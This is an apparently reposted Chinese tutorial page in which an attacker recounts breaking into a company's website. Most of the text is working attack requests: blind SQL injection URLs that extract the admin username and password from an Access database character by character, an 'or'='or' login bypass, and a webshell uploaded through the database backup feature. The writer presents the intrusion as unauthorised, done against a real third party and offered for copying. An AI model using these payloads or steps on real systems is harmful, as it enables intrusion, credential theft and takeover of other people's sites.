当前位置:Gxlcms > mysql > 手工注入access拿下某网站过程

手工注入access拿下某网站过程

时间:2021-07-01 10:21:17 帮助过:24人阅读

hacked by {R.H.T}12 http://www.xxx.com/NewsInfo.asp?id=95' 返回了错误页面。 http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1 正确页面。 http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2 返回了错误页面。 http://www.xxx.com/NewsInfo.asp?id=

hacked by {R.H.T}12


http://www.xxx.com/NewsInfo.asp?id=95'

返回了错误页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%201=1

正确页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%201=2

返回了错误页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists(selectcount(*)fromsysobjects)

返回了错误页面。确定ACCESS数据库。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin)

出错了。没有admin 的表名

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20vipusers)

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20account)

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_userinfo)

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20admin_user)

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage)

都没有。。。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20exists%20(select%20count(*)%20from%20manage_user)

有了。

猜出表名manage_user

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(password)%20from%20manage_user)>0

一下子就猜出了password的列名。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(user)%20from%20manage_user)>0

错误页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(manage_user)%20from%20manage_user)>0

错误页面。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(username)%20from%20manage_user)>0

正确页面。

整理下。

manage_user表。

列名为。

username

password

典型的垃圾站点。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)>5

出错了。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)<5

正确页面

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20count(*)%20from%20manage_user)=1

正确页面。只有一条记录数。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>3

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)>5

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(username)%20from%20manage_user)=5

正确了。

管理员用户名字的数字有5位。

丫肯定用的admin

试下。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,1,1))%20from%20manage_user)=97

转换下。97就是a

我们问问第二位是不是d吧。

这个时候 刚好临近0点。突然掉线了。。。很纠结。。关键时刻阳痿了一样。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,2,1))%20from%20manage_user)=100
返回了正常页面。100就是d

第一位是a第二位是d一共5个字母。一般都是admin

这个时候 群里开始叫了。。大家刚才都掉线了。。有人说台湾黑客攻击。很快。有人说国外刚才也掉线了。。具体原因现在不明。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,3,1))%20from%20manage_user)=109

第三位是m

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,4,1))%20from%20manage_user)=105

第四位是i

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(username,5,1))%20from%20manage_user)=110

第五位是n

okey`admin

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20len(password)from%20manage_user)=6

直接正确。密码有6位。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>50

返回正常。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>70

返回错误

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>60

错了。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)>65

错了

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=63

错了

。。。。迷糊了。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,1,1))%20from%20manage_user)=55

对了。。。。

55转换下。是7

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,2,1))%20from%20manage_user)=55

第二位也是7

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=55

第三位不是了。。

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,3,1))%20from%20manage_user)=59

对了。59转换下是;

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,4,1))%20from%20manage_user)=57

第四位。57转换下。是9

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,5,1))%20from%20manage_user)=62

第五位。转换下 62是>

http://www.xxx.com/NewsInfo.asp?id=95%20and%20(select%20top%201%20asc(mid(password,6,1))%20from%20manage_user)=62

第六位也是。。

总结下。

账号admin

密码77;9>>

OK 我们找后台。

http://www.xxx.com/manage/Login.asp

直接根据表名猜。猜对了。

用账号密码登陆。。。

提示账号密码不对~!

纠结。

难道不是这个后台。。

用工具扫了一下。。只扫出这么一个后台。

怎么办。

猜账号密码admin admin

不对。。这种傻逼已经很少了。

admin admin888

试了很久。。打算放弃了。

突然想起了万能密码。

'or'='or'

'or'='or'

进去了。。。。。。

我就操 他 女马 了。。。这个漏洞竟然还有。。。这什么垃圾站点。xxxxx邦汽车用品公司。。。

我怒了。提权。

看了下后台。在留言版那里看见有人插了一句话木马。我靠。删掉。

可以备份数据库。直接备份数据库传马。

OK拿下

http://www.xxx.com/UploadFiles/2010491394386.asp

http://www.xxx.com/1.asp

点评:笔者写的很详细了,其中管理密码这里是典型的雷池加密,77;9>>=658598。

标签分类: 脚本渗透

人气教程排行